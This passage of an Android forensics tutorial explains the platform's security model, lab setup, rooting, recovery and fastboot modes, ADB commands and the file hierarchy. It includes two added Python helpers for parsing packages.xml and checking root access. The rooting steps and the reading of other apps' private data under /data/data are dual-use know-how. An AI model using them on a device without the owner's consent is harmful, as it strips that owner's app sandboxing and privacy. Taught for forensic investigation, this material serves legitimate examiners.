<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2009 Oct 26</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">5</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-1-5" target="_top"><span style="font-size: 10pt;"><strong>Android 1.5</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Cupcake</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bluetooth A2DP, AVRCP support<br />
</span>
<span style="font-size: 10pt;">Record/watch videos</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2009 Apr 30</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">3</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android1-1" target="_top"><span style="font-size: 10pt;"><strong>Android 1.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Banana bread</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ability to save MMS attachments</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2009 Feb 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2</span></td>
</tr>
</tbody>
</table>
</div>
<h1>
Android Security</h1>
Android runs on the Linux kernel, which provides Android with the following security features –<br />
<ol>
<li><strong>User-based permissions model</strong> – Android OS implements
a permission model for individual apps. Applications must declare the
list of permissions they require in a file called manifest.xml. When a
user installs the application, Android presents the permission list to
the user, who can review it and allow or disallow the installation, as
shown below</li>
</ol>
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn1.png" /><br />
<strong>Note – We cannot install an Android application with only a
subset of its requested permissions. Either we accept all the permissions or
we decline to install it.<br />
</strong><br />
<ol>
<li><strong>Application sandboxing – </strong>Android by default makes
use of the Linux user-based protection model. Every Android application is
assigned a unique UID and runs as a separate process. By default, an
application cannot access the data of another application. So, if an
application tries to do something malicious, it can only do so within its
own context and with the permissions it has been granted by the OS. <strong><br />
</strong></li>
<li><strong>SELinux in Android – </strong>From Android 4.3, SELinux (Security Enhanced Linux) is supported by Android. SEAndroid uses <strong>MAC (Mandatory Access Control)</strong>, which
ensures that each application runs in an isolated environment. With SELinux on
Android, if a user installs a malicious app, the malware cannot access the
rest of the OS and corrupt the device. <strong><br />
</strong></li>
<li><strong>Application Signing – </strong>All Android apps are signed
by the developer/owner so that the author of the app can be identified. The keystore
and private key used for signing must be protected, because the same key is
required to push a new update to the application. <strong><br />
</strong></li>
<li><strong>Secure inter-process communication – </strong>As discussed
above, sandboxing between processes is obtained through the UID assigned
to each process. When an application needs to access the data of another
application through an Intent or a Content Provider, this is done safely using
the Binder mechanism. Suppose Process “A” wants to access data of Process
“B”: “A” is the client, and “B” is the Service. <strong><br />
</strong></li>
</ol>
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn2.png" /><br />
All requests and interactions between the Client and the Service pass
through a Proxy on the client side and a Stub on the service side. Every
request is mediated by the kernel, which enforces the security
checks.<br />
<h1>
Android Forensics Lab Setup</h1>
We assume the reader has installed and set up Android Studio, the Android SDK, and the Android Emulator. If not, please refer to –<br />
<div style="margin-left: 21pt;">
For SDK –</div>
<div style="margin-left: 21pt;">
<a href="https://developer.android.com/studio/install.html">https://developer.android.com/studio/install.html</a></div>
<div style="margin-left: 21pt;">
For Android Emulator –</div>
<div style="margin-left: 21pt;">
<a href="https://developer.android.com/studio/run/emulator.html">https://developer.android.com/studio/run/emulator.html</a></div>
<div style="margin-left: 21pt;">
<a href="https://www.embarcadero.com/starthere/xe5/mobdevsetup/android/en/creating_an_android_emulator.html">https://www.embarcadero.com/starthere/xe5/mobdevsetup/android/en/creating_an_android_emulator.html</a></div>
In this paper, we are using Android 4.4<br />
<strong>Why we need an Emulator – </strong>An emulator allows an investigator to understand how certain applications behave and how the installation of an application affects the device. Another advantage is that you
can build an emulator with the desired Android version. This is especially
helpful when working with devices running older versions of Android.<br />
<br />
<strong>Also, an AVD (Android Virtual Device) comes with root access by default.<br />
</strong><br />
<strong>Rooting Android Phone –</strong> Rooting is the process of
letting the user of an Android phone gain the highest privilege, i.e. root
user privilege, on the phone. Android is based on Linux, as
discussed; thus, gaining root access is the same as gaining root user or
administrative access on a Linux OS.<br />
Rooting is needed to understand the internals of the device. It also
helps overcome certain limitations and barriers in the
investigation. By rooting an Android device, you can alter or replace
system applications and settings, run specialized apps that require
administrator-level permissions, or perform operations that are otherwise
inaccessible to a normal Android user.<br />
However, from a forensic point of view, the main reason for rooting
is to gain access to those parts of the system that are normally not
accessible. Most public root tools result in a permanent
root, where the changes persist even after the device reboots. With
a temporary root, the changes are lost once the device
reboots. Temporary roots should always be preferred over permanent ones for
forensic investigation.<br />
<strong>Why Root an Android Phone – </strong>As discussed, in Android
each application is assigned a UID and runs as a separate process,
and applications are segregated so that one application cannot
access the data of another. The UIDs assigned to
applications are stored in the packages.xml file in the <strong>/data/system</strong>
folder. In addition to UIDs, this file also stores the Android
permissions granted to each program. The private data of each
application is stored under <strong>/data/data</strong> and is
accessible only to that application. Hence, during the course of an
investigation, the data at this location cannot be accessed if
the phone is not rooted, since a normal user cannot read another
application’s data. Rooting the phone allows us to access
data in any location. Thus, it is necessary to root the Android
phone.<br />
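As an added example (not part of the original article), the following Python script parses a packages.xml file in the layout described above and ties it back to the sandboxing model from the Android Security section: every package gets a UID and a permission set, but two packages that declare the same sharedUserId run under one UID and share one permission set, so the per-app isolation does not apply between them. The sample XML, package names, UIDs and permissions below are constructed for the demonstration; the element and attribute names (package, userId, sharedUserId, shared-user, perms/item) follow the KitKat-era file format.<br />

```python
"""Parse an Android 4.x-era /data/system/packages.xml (added example, not the article's code)."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

FIRST_APPLICATION_UID = 10000  # UIDs below this belong to system, radio, shell and similar accounts

# Constructed sample: names, UIDs and permissions are invented for this demonstration.
SAMPLE_PACKAGES_XML = """
<packages>
  <shared-user name="android.uid.system" userId="1000">
    <perms>
      <item name="android.permission.READ_CONTACTS" />
      <item name="android.permission.WRITE_CONTACTS" />
      <item name="android.permission.WRITE_SETTINGS" />
    </perms>
  </shared-user>
  <package name="com.android.settings" codePath="/system/app/Settings.apk" sharedUserId="1000" />
  <package name="com.android.contacts" codePath="/system/app/Contacts.apk" sharedUserId="1000" />
  <package name="com.example.chat" codePath="/data/app/com.example.chat-1.apk" userId="10052">
    <perms>
      <item name="android.permission.INTERNET" />
      <item name="android.permission.READ_CONTACTS" />
      <item name="android.permission.READ_SMS" />
    </perms>
  </package>
  <package name="com.example.notes" codePath="/data/app/com.example.notes-1.apk" userId="10053" />
</packages>
"""


@dataclass
class PackageRecord:
    name: str
    uid: int
    shared_uid: bool      # True when the UID comes from a sharedUserId declaration
    code_path: str
    permissions: list


def parse_packages_xml(xml_text):
    """Return one PackageRecord per installed package, with its effective UID and permissions."""
    root = ET.fromstring(xml_text.strip())
    # Permissions of a shared UID are recorded once, on the shared-user element,
    # and apply to every package that runs under that UID.
    shared_perms = {}
    for su in root.findall("shared-user"):
        shared_perms[int(su.get("userId"))] = [i.get("name") for i in su.findall("./perms/item")]
    records = []
    for pkg in root.findall("package"):
        if pkg.get("sharedUserId") is not None:
            uid, shared = int(pkg.get("sharedUserId")), True
            perms = shared_perms.get(uid, [])
        elif pkg.get("userId") is not None:
            uid, shared = int(pkg.get("userId")), False
            perms = [i.get("name") for i in pkg.findall("./perms/item")]
        else:
            continue  # malformed entry: no UID recorded for this package
        records.append(PackageRecord(pkg.get("name"), uid, shared, pkg.get("codePath", ""), sorted(perms)))
    return records


def packages_sharing_uid(records):
    """UIDs used by more than one package: these packages are not sandboxed from each other."""
    by_uid = {}
    for rec in records:
        by_uid.setdefault(rec.uid, []).append(rec.name)
    return {uid: sorted(names) for uid, names in by_uid.items() if len(names) > 1}


def packages_with_permission(records, permission):
    """Packages whose effective permission set (own or inherited via shared UID) holds `permission`."""
    return sorted(rec.name for rec in records if permission in rec.permissions)


def is_application_uid(uid):
    """Third-party and most preinstalled apps get UIDs at or above FIRST_APPLICATION_UID."""
    return uid >= FIRST_APPLICATION_UID


def private_data_dir(record):
    """Where the package's private data lives; readable only by that UID (or root)."""
    return "/data/data/" + record.name


if __name__ == "__main__":
    recs = parse_packages_xml(SAMPLE_PACKAGES_XML)
    for rec in recs:
        print(rec.uid, rec.name, "shared" if rec.shared_uid else "own", rec.permissions)
    print("shared UIDs:", packages_sharing_uid(recs))
```

To run it against a real device, pull /data/system/packages.xml with adb on a rooted phone or an emulator and pass the file contents to parse_packages_xml(). The shared-UID report is the part worth reading first: in the sample, Settings holds READ_CONTACTS only because it shares UID 1000 with Contacts, which is exactly the kind of relationship the per-package permission list on the install screen does not show.<br />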
<strong>Recovery and Fastboot – </strong>It is necessary to understand the recovery, boot loader, and fastboot modes in Android. The following sections explain these in detail –<br />
<strong>Recovery Mode</strong> – Any Android phone has three main
partitions: boot loader, Android ROM, and recovery. The boot loader is
present in the first partition and is the first program that runs when
the phone is powered on.<br />
The primary role of the boot loader is to take care of low-level
hardware initialization and to boot the device into the other partitions. It
usually loads the Android partition, commonly called the Android ROM.
The Android ROM contains all the operating system files that are necessary
to run the device. The recovery partition, commonly called the stock
recovery, is used to delete all user data and files or to perform system
updates.<br />
Example – When we do a factory reset on our phone, recovery boots up
and erases the files and data. Similarly, with updates, the phone boots
into the recovery mode to install the latest updates that are written to
the Android ROM partition. Hence, the recovery mode is the screen we
always see when we install any official update on the device.<br />
<strong>Screenshot</strong> – Stock Recovery Mode on Android<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn3.png" /><br />
<em>Stock Recovery Mode Options</em><br />
The stock Android recovery is <strong>intentionally</strong> very
limited in functionality. It has the options to reboot the system, apply
updates from adb and SD card, factory reset, etc. However, custom
recovery offers many more options.<br />
<strong>Custom recovery – </strong>Custom recovery is a third-party
recovery environment. Flashing this recovery environment onto your
device replaces the default stock recovery environment with a
third-party, customized recovery environment. <strong><br />
</strong><br />
Most common features included in custom recovery:<br />
<ol>
<li>Full backup and restore functionality</li>
<li>Allow unsigned update packages, or signed packages with custom keys</li>
<li>Selectively mount device partitions and the SD card</li>
<li>Provide USB mass storage access to the SD card or data partitions</li>
<li>Provide full ADB access, with the ADB daemon running as root</li>
<li>A fully featured BusyBox binary (BusyBox is a collection of common command-line tools in a single executable)</li>
</ol>
There are several custom recovery images available in the market
today, such as ClockworkMod Recovery, TeamWin Recovery Project, and so
on.<br />
Screenshot – Below screenshot shows the options available with ClockworkMod Recovery:<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn4.jpg" /><br />
<em>Custom recovery Options</em><br />
<strong>Fastboot mode – </strong>Fastboot is a protocol that can be
used to reflash partitions on your device; the fastboot tool ships
with the Android SDK. It is an alternative to the recovery
mode for performing installations and updates, and in some cases for unlocking the boot
loader. While in fastboot, you can modify the filesystem images
from a computer over a USB connection. Hence, it is one of the ways to
install recovery images, or in some cases simply to boot one. Once the phone
is booted into fastboot, you can flash image files to the internal
memory. <strong><br />
</strong><br />
<strong>Locked and unlocked boot loaders – </strong>Boot loaders may
be locked or unlocked. A locked boot loader does not allow us to make
modifications to the device’s firmware, by enforcing restrictions at
the boot loader level. In other words, to run any recovery image or our
own operating system, the boot loader needs to be unlocked first.<br />
Some devices can be unlocked officially. For these devices,
the boot loader can be unlocked by putting the device into fastboot
mode and running the “<strong>fastboot oem unlock</strong>” command. This will unlock the boot loader of the Android device.<br />
Some other manufacturers provide unlocking through different means,
for instance, through their websites and so on. The following screenshot
shows the HTC website providing support to unlock HTC devices:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn5.png" /></div>
<div style="text-align: center;">
<em>Unlocking Boot Loader from HTC Official Website<br />
</em></div>
<strong>How to Root </strong>– In this section, we will learn how to
Root an Android Phone. Gaining root access on a device with an unlocked
boot loader is very easy but gaining root access on a device with a
locked boot loader is not so straightforward.<br />
<strong>Rooting unlocked Boot-Loader </strong>– The process of rooting mainly involves copying the <strong>superuser </strong>(<strong>su</strong>) binary to a location in the current process’s path (/system/xbin/su) and granting it executable permissions with the <strong>chmod</strong> command. Hence, the first step here is to unlock the boot loader. As explained in the earlier
section, depending on the device manufacturer, unlocking a boot
loader can be done either through the fastboot mode or by following the
vendor-specific boot loader unlock procedure. The su binary comes along
with an Android application, such as Superuser, that provides a
graphical prompt each time an application requests root access.<br />
In our case, we will root a Lenovo phone. Rooting
steps vary from one manufacturer to another, so the steps for
your phone may differ. There are many tools available for
rooting, and which one applies depends on the
manufacturer. In our case, we will use Lenovo K3 Note Manager.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn6.jpg" /></div>
<div style="text-align: center;">
<em>Enabling USB Debugging<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn7.png" /></div>
<div style="text-align: center;">
<em>Selecting Device on K3 Note Manager</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn8.png" /></div>
<div style="text-align: center;">
<em>Device Connected Notification<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn9.png" /></div>
<div style="text-align: center;">
<em>Rooting in Progress<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn10.png" /></div>
<div style="text-align: center;">
<em>Rooting in Progress</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn11.png" /></div>
<div style="text-align: center;">
<em>Device Rooted Successfully<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn12.jpg" /></div>
<div style="text-align: center;">
<em>SuperSU Installed Successfully<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn13.jpg" /></div>
<div style="text-align: center;">
<em>Root Access on device<br />
</em></div>
<strong>Note –</strong> From Android 4.1, a new feature called
sideload mode has been introduced. This feature allows us to apply an
update zip over ADB without copying it to the device beforehand. To
sideload an update, run the adb sideload su-package.zip command, where
su-package.zip is the filename of the update package on your computer.
Alternatively, you can also modify a factory image to add a su binary.
This is done by unpacking an ext4-formatted system image, adding the
su binary, and repacking it. If this image is flashed, the system will contain
the su binary, and the device will be rooted.<strong><br />
</strong><br />
<h1>
Data Storage on Android Devices</h1>
The main motive of forensic analysis is to extract necessary data
from the device. Hence, for effective forensic analysis, it is important
and necessary to know what kind of data is stored on the device, where
it is stored, how it is stored, and the details of the filesystems on
which the data is stored. This knowledge is very important to a forensic
analyst to make an informed decision about where to look for data and
the techniques that can be used to extract the data. In this section, we
will cover the following topics:<br />
<ol>
<li>Android partition layout and file hierarchy</li>
<li>Application data storage on the device</li>
<li>An overview of the Android filesystem</li>
<li>
<div>
<strong>Android partition layout and file hierarchy – </strong>The
partition layout varies between device manufacturers and versions.
However, a few partitions are present in all Android devices. Some of
the common partitions found in most Android devices are listed below.</div>
<ol>
<li><strong>Boot loader – </strong>This partition stores the phone’s
boot loader program. This program takes care of initializing the
low-level hardware when the phone boots. Thus, it is responsible for
booting the Android kernel and for booting into other boot modes, such as
the recovery mode, download mode, and so on.<strong><br />
</strong></li>
<li><strong>Boot – </strong>As the name suggests, this partition has the
information and files required for the phone to boot. It contains the
kernel and RAM disk. So, without this partition, the phone cannot start
its processes.<strong><br />
</strong></li>
<li><strong>Recovery – </strong>Recovery partition allows the device to
boot into the recovery console through which activities such as phone
updates and other maintenance operations are performed. For this
purpose, a minimal Android boot image is stored. This boot image serves
as a failsafe.<strong><br />
</strong></li>
<li><strong>Userdata – </strong>This partition is usually called the
data partition and is the device’s internal storage for application
data. A bulk of user data is stored here, and this is where most of our
forensic evidence will reside. It stores all app data and standard
communications as well.<strong><br />
</strong></li>
<li><strong>System – </strong>All the major components other than kernel
and RAM disk are present here. The Android system image here contains
the Android framework, libraries, system binaries, and preinstalled
applications. Without this partition, the device cannot boot into normal
mode.<strong><br />
</strong></li>
<li><strong>Cache – </strong>This partition is used to store frequently
accessed data and various other files, such as recovery logs and update
packages downloaded over the cellular network.<strong><br />
</strong></li>
<li><strong>Radio – </strong>Devices with telephony capabilities have a
baseband image stored in this partition that takes care of various
telephony activities.<strong><br />
</strong></li>
</ol>
</li>
</ol>
Android Debug Bridge (ADB) – In Android forensics, ADB plays an
important role. It is present in the &lt;sdk_path&gt;/platform-tools folder,
for example C:\Android\SDK\platform-tools. There you will find an
executable called adb.exe, as shown<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn14.png" /></div>
The Android Debug Bridge, as the name suggests, acts as a bridge between
the computer and the mobile phone: whenever we want to communicate with the
phone from the computer, we do it via ADB.
To work with ADB, the USB debugging option must be enabled on the phone.
On a Lenovo phone, this is done by selecting the developer option as shown
in the figure below<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn15.jpg" /></div>
<div style="text-align: center;">
<em>Fig 1 –</em><br />
<em>Selecting Developer Options<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn16.jpg" /></div>
<div style="text-align: center;">
<em>Fig 2 –</em><br />
<em>Enabling USB Debugging</em></div>
However, this varies between devices, and the USB Debugging option should be enabled accordingly.<br />
Note – On some smartphones, the Developer options menu is hidden. It
can be turned on by tapping the Build Number field in Settings &gt;
About Device seven times.<br />
ADB usually runs with a non-privileged shell account. Thus, it will
not provide access to internal application data. But on a rooted phone,
ADB runs with the root shell account and provides access to internal
application data and OS files and folders.<br />
Using ADB to access the device – Connect the device to the computer.
After connecting the device and before issuing adb
commands, it is helpful to know whether the mobile phone is connected to
the adb server. This can be done using the adb.exe devices command.
This command lists all the devices that are connected to the
computer, as shown below. It will also list the
emulator if it is running at the time the command is issued<br />
Command –<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe devices<br />
List of devices attached<br />
4df16ac5115e4e04 device<br />
Issuing Shell Commands to the Mobile Phone – As stated above, Android
runs on Linux and provides a way to access a shell. Using ADB, we can
gain a shell on the Android phone. Once we have a shell,
we can run most of the usual Linux commands. We gain shell access on the
mobile with the adb.exe command as shown below –<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe shell<br />
shell@android:/ $<br />
After executing the shell command, a shell prompt is displayed to the
user. In this shell prompt, commands can be executed on the device. For
instance, as shown in the command line below, the ls command can be used to
view all the files within a directory.<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe shell<br />
shell@android:/ $ ls<br />
ls<br />
acct<br />
cache<br />
config<br />
d<br />
data<br />
default.prop<br />
dev<br />
efs<br />
etc<br />
factory<br />
fstab.smdk4x12<br />
Installing an Application – During the investigation, it may happen
that we need to install some applications on the device for extracting
data from the device. It can be done by issuing the command:<br />
adb.exe install name_of_the_application.apk<br />
Example –<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe install test.apk<br />
4311 KB/s (13855934 bytes in 3.138s)<br />
pkg: /data/local/tmp/test.apk<br />
Success<br />
Pulling Data from Device – If there is any need to pull the data from the mobile, it can be done using adb pull command.<br />
Syntax – adb pull path_to_file_on_android_device path_to_file_on_local_computer<br />
Note – On a normal Android phone, we won’t be able to download all
the files using the adb pull command, because of the inherent security
features provided by the Android operating system.<br />
Example – Files present under the /data/data folder cannot be accessed on an Android device that is not rooted.<br />
Pushing data to the device – If there is any need to push the data to the mobile, it can be done using adb push command.<br />
Syntax – adb push path_to_file_on_local_computer path_to_file_on_android_device<br />
ADB on a rooted device – We have seen how the ADB tool can be used to
interact with the device and execute certain commands on it.
However, on a normal Android phone, certain locations, such as
/data/data, cannot be accessed.<br />
Example – The following command-line output appears when we try to access /data/data on a normal device:<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe shell<br />
shell@android:/ $ cd /data/data<br />
cd /data/data<br />
shell@android:/data/data $ ls<br />
ls<br />
opendir failed, Permission denied<br />
This is because the private data of all the applications are stored
in this folder. Thus, the security is enforced by Android. Only the root
user has access to this location.<br />
Hence, on a rooted device, we will be able to see all the data from this location, as shown in the following commands:<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe shell<br />
shell@android:/ # ls /data/data<br />
ls /data/data<br />
android.googleSearch.googleSearchWidget<br />
com.android.MtpApplication<br />
com.android.Preconfig<br />
com.android.apps.tag<br />
com.android.backupconfirm<br />
com.android.bluetooth<br />
com.android.browser<br />
com.android.calendar<br />
com.android.certinstaller<br />
com.android.chrome<br />
com.android.clipboardsaveservice<br />
com.android.contacts<br />
com.android.defcontainer<br />
com.android.email<br />
com.android.exchange<br />
com.android.facelock<br />
com.android.htmlviewer<br />
com.android.inputdevices<br />
com.android.keychain<br />
com.android.mms<br />
As shown in the above command, the private data of all the
applications can now be seen easily by navigating to the respective
folders. Hence, the ADB tool on a rooted device allows an examiner to
access all the data of applications installed on the device.<br />
Note<br />
Sometimes, even on a rooted phone, you will see the permission-denied
message. In such cases, after executing the adb shell command, try
entering superuser mode by typing su. If root is enabled, you
will see the # prompt without being asked for a password.<br />
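The checks described in this section (is the device attached and authorized, does the adb shell run as root, is /data/data listable) are easy to script before an acquisition. The following Python helper is an added example, not code from the article: it drives adb through an injectable runner, so the same logic can be exercised offline against canned command output. The device serial is the one shown in the article’s listing; the id and ls outputs for the unrooted and rooted cases are constructed to match the behaviour the article describes.<br />

```python
"""Pre-acquisition checks around ADB (added example, not the article's code)."""
import re
import subprocess

ADB = "adb"  # assumption: adb (adb.exe on Windows) is on PATH, e.g. from the SDK platform-tools folder


def run_adb(args, serial=None):
    """Run one adb command and return its combined stdout/stderr as text.
    Not called by the offline demo; pass it to preflight() for a real device."""
    cmd = [ADB] + (["-s", serial] if serial else []) + list(args)
    proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                          text=True, check=False)
    return proc.stdout


def parse_adb_devices(output):
    """Turn 'adb devices' output into {serial: state}.
    State is 'device' (usable), 'unauthorized' (the USB debugging prompt on the
    phone was not accepted) or 'offline'; header and daemon-startup lines are skipped."""
    devices = {}
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("List of devices") or line.startswith("*"):
            continue
        parts = line.split()
        if len(parts) >= 2:
            devices[parts[0]] = parts[1]
    return devices


_UID_RE = re.compile(r"\buid=(\d+)")


def shell_is_root(id_output):
    """True when the output of `id` inside the adb shell reports uid 0.
    The article keys on the prompt ($ versus #); `id` is the same check in a
    form that is easier to parse from a script."""
    match = _UID_RE.search(id_output)
    return match is not None and int(match.group(1)) == 0


def is_permission_denied(output):
    """Detect the 'opendir failed, Permission denied' style error from ls."""
    return "permission denied" in output.lower()


def preflight(run, serial):
    """Report whether the device is attached and usable, whether the adb shell is
    root, and whether /data/data (private application data) can be listed."""
    state = parse_adb_devices(run(["devices"])).get(serial, "absent")
    report = {"serial": serial, "state": state, "root": False, "data_data_readable": False}
    if state != "device":
        return report  # unauthorized/offline/absent: nothing more can be checked
    report["root"] = shell_is_root(run(["shell", "id"], serial))
    report["data_data_readable"] = not is_permission_denied(run(["shell", "ls", "/data/data"], serial))
    return report


# Constructed sample outputs mimicking a non-rooted phone (serial taken from the article's listing)
UNROOTED_OUTPUTS = {
    ("devices",): "List of devices attached\n4df16ac5115e4e04\tdevice\nemulator-5554\tunauthorized\n\n",
    ("shell", "id"): "uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input)\n",
    ("shell", "ls", "/data/data"): "opendir failed, Permission denied\n",
}

# Constructed sample outputs mimicking the same phone after rooting (adbd running as root)
ROOTED_OUTPUTS = {
    ("devices",): "List of devices attached\n4df16ac5115e4e04\tdevice\n\n",
    ("shell", "id"): "uid=0(root) gid=0(root)\n",
    ("shell", "ls", "/data/data"): "com.android.browser\ncom.android.contacts\ncom.android.mms\n",
}


def make_fake_run(outputs):
    """Build a runner with the same signature as run_adb that replays canned output."""
    def fake_run(args, serial=None):
        return outputs[tuple(args)]
    return fake_run


if __name__ == "__main__":
    for label, outputs in (("unrooted", UNROOTED_OUTPUTS), ("rooted", ROOTED_OUTPUTS)):
        print(label, preflight(make_fake_run(outputs), "4df16ac5115e4e04"))
```

Against a real handset, call preflight(run_adb, serial). A state of unauthorized means the phone is still waiting for the USB debugging confirmation and no shell command will work yet; a root value of False together with data_data_readable False is the normal, unrooted picture described above, and the report documents that state before any pull is attempted.<br />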
<h1>
Android file hierarchy</h1>
A basic understanding of how Android organizes its data in files and
folders helps a forensic analyst narrow down the search to specific
locations. If you are familiar with Unix-like systems, you will
understand the file hierarchy in Android very well. Depending on the device
manufacturer and the underlying Linux version, the structure of this
hierarchy may show a few insignificant differences. To see the complete file
hierarchy, you need to have root access.<br />
Here is the sample screenshot –<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn17.png" /><br />
<strong>Directories Overviews<br />
</strong><br />
<ol>
<li><strong>Acct – </strong>This is the mount point for the acct cgroup (control group) that provides for user accounting.<strong><br />
</strong></li>
<li><strong>Cache – </strong>This is the directory (/cache) where
Android stores frequently accessed data and app components. Wiping the
cache doesn’t affect your personal data, but simply deletes the existing
data there. There is also another directory in this folder called
lost+found. This directory holds recovered files (if any) in the event
of filesystem corruption, such as incorrectly removing the SD card
without unmounting it and so on. The cache may contain forensically
relevant artifacts, such as images, browsing history, and other app
data.<strong><br />
</strong></li>
<li><strong>d – </strong>This is a symbolic link to /sys/kernel/debug. This folder is used to mount the debugfs filesystem and to debug kernel.<strong><br />
</strong></li>
<li><strong>data – </strong>This is the partition that contains the data
of each application. Most of the data belonging to a user, such as the
contacts, SMS, dialed numbers, and so on, is stored in this folder. This
folder has significant importance from a forensic point of view as it
holds valuable data. The following screenshot shows the folders present
in this partition:</li>
</ol>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn18.png" /></div>
<div style="margin-left: 36pt;">
Important sub-directories under data folder</div>
<ol>
<li><strong>dalvik-cache – </strong>This folder contains several logs that might be useful during the examination, depending on the underlying requirements.</li>
<li><strong>data – </strong>The /data/data partition contains the
private data of all the applications. Most of the data belonging to the
user are stored in this folder. This folder has significant importance
from a forensic point of view as it holds valuable data.<strong><br />
</strong></li>
<li><strong>dev – </strong>This directory contains special device files
for all the devices. It is the mount point for the tmpfs filesystem.
